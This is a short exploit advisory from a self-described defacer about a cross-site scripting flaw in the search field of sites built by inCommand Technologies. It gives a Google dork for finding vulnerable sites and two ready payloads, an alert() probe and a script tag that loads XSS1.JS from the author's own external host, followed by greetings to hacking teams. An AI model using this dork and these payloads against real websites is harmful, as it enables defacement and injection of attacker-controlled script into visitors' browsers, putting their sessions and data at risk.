#------------In The Name Of God------------ #inCommand Technologies, Inc. Cross-site Scripting Vulnerability ################################### #AUTHOR: md.r00t #Mail: md.r00t.defacer@xxxxxxxxx #Website: www.r00t.gigfa.com #Forum: http://ajaxtm.com/forum ################################### #Google D0rk: # "Website Design by inCommand Technologies, Inc." ################################### # xss EXPLOIT: <script>alert(/0/)</script> <script src="http://md-r00t.persiangig.com/xpl/XSS1.JS"></script> ######VULN IN HERE################## Vulnerabilities in the search field located ;) #################################### #TNX: #Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team) ***************************************